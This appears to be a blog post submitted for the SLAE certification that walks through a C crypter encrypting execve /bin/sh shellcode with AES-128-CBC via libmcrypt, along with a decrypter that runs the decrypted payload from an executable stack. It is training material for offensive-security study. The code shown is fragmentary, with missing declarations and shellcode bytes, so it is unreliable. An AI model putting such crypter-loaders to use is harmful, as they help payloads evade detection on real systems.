The last assignment is to create a crypter which will encrypt the shellcode.

Our goal for this assignment is:

  • Create Crypter
  • Can use any encryption scheme
  • Can use any programming language for implementation

Encryption Scheme - [RIJNDAEL-128-CBC]

I decided to use existing encryption scheme Rijndael-128-CBC. Rijndael is a symmetric block cipher, designed by Joan Daemen and Vincent Rijmen, and was approved for the USA’s NIST Advanced Encryption Standard, FIPS-197. The cipher has a variable block length and key length. Rijndael can be implemented very efficiently on a wide range of processors and in hardware. The design of Rijndael was strongly influenced by the design of the block cipher Square. There exist three versions of this algorithm, namely: RIJNDAEL-128 (the AES winner) , RIJNDAEL-192 , RIJNDAEL-256. The numerals 128, 192 and 256 stand for the length of the block size.

Programming Language

Choosing the programming language was not a hard thing for me. I will be using “C” language along with the libmcrypt encryption/decryption library to implement the Crypter.

AES RIJNDAEL-128-CBC Implementation

Before we dive into actual implementation, let us look at the encryption sheme.

  • Rinjndael-128 (128 bit block size)
  • Uses CBC (cipher block chaining) mode.
  • Key size 128 bit (16 byte)

Below is the fully commented code for the Crypter implementation. The execve /bin/sh shellcode is used in the below code.

* Description	: AES-RIJNDAEL-128-CBC Encrypt shellcode using libmcrypt
* Filename	: AESCrypter.c
* mcrypt API details -
* sudo apt-get install libmcrypt-dev
* gcc AESCrypter.c -o AESCrypter -lmcrypt

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <mcrypt.h>

#include <math.h>
#include <stdint.h>
#include <stdlib.h>

// Function that encrypts the shellcode
    void* buffer,
    int buffer_len, /* the shellcode could include null bytes*/
    char* IV,
    char* key,
    int key_len
  *	 mcrypt_module_open function associates the algorithm and the mode specified [Algorithm: rijndael-128, mode: CBC]
  *	 Returns an encryption descriptor, or MCRYPT_FAILED on error
  MCRYPT td = mcrypt_module_open("rijndael-128", NULL, "cbc", NULL);

  int blocksize = mcrypt_enc_get_block_size(td);
  // buffer_len should be k*algorithms_block_size if used in a mode which operated in blocks (cbc, ecb, nofb)
  if( buffer_len % blocksize != 0 ){return 1;}
  // initializes all buffers for the specified thread
  mcrypt_generic_init(td, key, key_len, IV);

  *	main encryption function. td is the encryption descriptor returned by mcrypt_generic_init(). 
  *	buffer contains the shellcode wewish to encrypt and buffer_len is the length (in bytes) of shellcode.
  *	Returns 0 on success.
  mcrypt_generic(td, buffer, buffer_len);

  // This function terminates encryption specified by the encryption descriptor (td)
  mcrypt_generic_deinit (td);

  // This function closes the modules used by the descriptor td. 
  return 0;

int main()
  MCRYPT td;

  // execve /bin/sh shellcode
  char * shellcode = \

  int ctr;
  int shellcode_len;
  shellcode_len = strlen(shellcode);
  // Initializaion Vector

  // key
  char *key = "ub3r53cr3t435k3y";
  int keysize = 16; /* 128 bits */
  char* buffer;

  // must be larger than or equal to shellcode length and should be k*algorithms_block_size if used in a mode which operated in blocks (cbc, ecb, nofb)
  // CBC in this case
  int buffer_len = 64; 

  buffer = calloc(1, buffer_len);
  // Copy the shellcode to a buffer
  strncpy(buffer, shellcode, buffer_len);

  printf("\n==Original Shellcode==\n");
	printf("\\x%02x", shellcode[ctr]&0xff);

  //Encrypt buffer
  AES_ENCRYPT(buffer, buffer_len, IV, key, keysize); 

  printf("\n==Encrypted Shellcode==\n");
       printf("\\x%02x", buffer[ctr]&0xff);

  return 0;

Lets compile this and run the Crypter executable. asn-7-crypter-out

As we can see, the encrypted shellcode length is few bytes more than the original shellcode, infact it is equal to the buffer size we have specified in the code [64]. Our buffer length should be such that it should accomodate our shellcode and should be k*algorithms_block_size.

With that out of the way, lets move on to the decryption.

Decryption Implementation

The Decrytper will decrypt the encryted shellcode and will pass control to the decrypted shellcode once decryption is completed. Below is the fully commented code for the decrypter.

* Description	: Decrypts AES-RIJNDAEL-128-CBC Encrypted shellcode and Executes
* Filename	: AESCrypter.c
* sudo apt-get install libmcrypt-dev
* gcc AESDeCryptExec.c -o AESDeCryptExec -lmcrypt -fno-stack-protector -z execstack

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <mcrypt.h>

#include <math.h>
#include <stdint.h>
#include <stdlib.h>

// Function that Decrypts the shellcode
    void* buffer,
    int buffer_len,
    char* IV, 
    char* key,
    int key_len 
  *	 mcrypt_module_open function associates the algorithm and the mode specified [Algorithm: rijndael-128, mode: CBC]
  *	 Returns an encryption descriptor, or MCRYPT_FAILED on error
  MCRYPT td = mcrypt_module_open("rijndael-128", NULL, "cbc", NULL);
  int blocksize = mcrypt_enc_get_block_size(td);

  // buffer_len should be k*algorithms_block_size if used in a mode which operated in blocks (cbc, ecb, nofb)
  if( buffer_len % blocksize != 0 ){return 1;}
  // initializes all buffers for the specified thread
  mcrypt_generic_init(td, key, key_len, IV);
  // The decryption function. Returns 0 on success. 
  mdecrypt_generic(td, buffer, buffer_len);

  // This function terminates encryption specified by the encryption descriptor (td). Actually it clears all buffers.
  mcrypt_generic_deinit (td);

  // This function closes the modules used by the descriptor td.
  return 0;

int main()
  MCRYPT td;

  // Encrypted shellcode
  char * encr_shellcode = \
  int ctr;
  int shellcode_len;
  shellcode_len = strlen(encr_shellcode);
  // Initializaion Vector

  // Encryption Key
  char *key = "ub3r53cr3t435k3y";
  int keysize = 16; /* 128 bits */
  char* buffer;

  // must be larger than or equal to shellcode length and should be k*algorithms_block_size if used in a mode which operated in blocks (cbc, ecb, nofb)
  // CBC in this case
  int buffer_len = 64;

  buffer = calloc(1, buffer_len);
  strncpy(buffer, encr_shellcode, buffer_len);

  int (*ret)() = (int(*)())buffer;

  // Display the encrypted shellcode
  printf("\n==Encrypted Shellcode==\n");
	printf("\\x%02x", encr_shellcode[ctr]&0xff);

  // Decrypt Buffer
  AES_DECRYPT(buffer, buffer_len, IV, key, keysize);
  printf("\n==Decrypted Shellcode==\n");
	printf("\\x%02x", buffer[ctr]&0xff);

  printf("\n\n==Jumping to Decrypted Payload==\n");

Lets see the Decrypter in action. Compiling and executing the Decrypter. asn-7-decrypter-out

And we are done :)

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE-933